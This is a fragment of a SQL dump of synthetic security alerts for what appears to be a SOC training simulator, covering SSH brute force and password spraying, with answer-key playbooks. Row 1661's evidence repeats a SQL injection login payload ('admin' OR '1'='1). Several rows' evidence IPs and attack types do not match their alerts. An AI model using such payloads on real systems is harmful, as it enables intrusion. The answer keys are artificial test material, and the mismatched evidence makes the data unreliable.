(1661, 'Password Spraying Detected Against Internal Web Portal', 'high', 'Elastic SIEM', 'Multiple failed login attempts detected from a single external IP address against the internal web portal, suggesting a password spraying attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:12:34Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.10\",\"dst_ip\":\"10.0.0.5\",\"username\":\"user1\",\"hostname\":\"web-portal\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP was confirmed malicious through OSINT, indicating a true positive attack.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.925Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1662, 'SSH Brute Force Spike Detected', 'critical', 'Wazuh', 'A significant spike in failed SSH login attempts from a foreign IP address indicates a brute force attack on the server.', 'Brute Force', 'T1110', 1, 'investigating', NULL, '{\"timestamp\":\"2026-03-15T06:45:22Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.143.223.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"root\",\"hostname\":\"ssh-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 21:15:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently involved in brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"OSINT confirms the external IP as malicious, validating the brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.143.223.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1663, 'Failed SSH Logins From Known Malicious IP', 'high', 'Azure Sentinel', 'Several failed SSH login attempts from a known malicious IP address detected against a critical server.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:15:44Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"172.16.0.20\",\"username\":\"admin\",\"hostname\":\"critical-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"172.16.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s history of malicious activity confirms the attack as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.928Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:44Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"172.16.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"critical-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1664, 'Unusual Login Activity Detected', 'medium', 'Splunk', 'Single IP address triggered 30 failed login attempts against different accounts on the internal web portal.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:20:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.22\",\"dst_ip\":\"10.0.0.8\",\"username\":\"testuser\",\"hostname\":\"web-portal\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for password spraying attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"testuser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s history of malicious activity indicates a definite attack.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.931Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:20:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1665, 'Failed Login Attempts from Unusual Location', 'high', 'Elastic SIEM', 'Multiple login failures from a foreign IP address targeting the internal SSH server indicate a brute force attempt.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:05:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"192.168.1.12\",\"username\":\"guest\",\"hostname\":\"ssh-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"guest\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly used username in attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed attempts and external IP\'s reputation confirm this as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.932Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"192.168.1.12\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1666, 'Potential Password Spraying Detected', 'medium', 'Wazuh', 'A foreign IP address initiated numerous failed login attempts on the company\'s web application.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:30:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"10.0.0.9\",\"username\":\"user2\",\"hostname\":\"web-app\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for engaging in password spraying\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.9\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attack pattern and malicious IP reputation confirm this as an attack attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
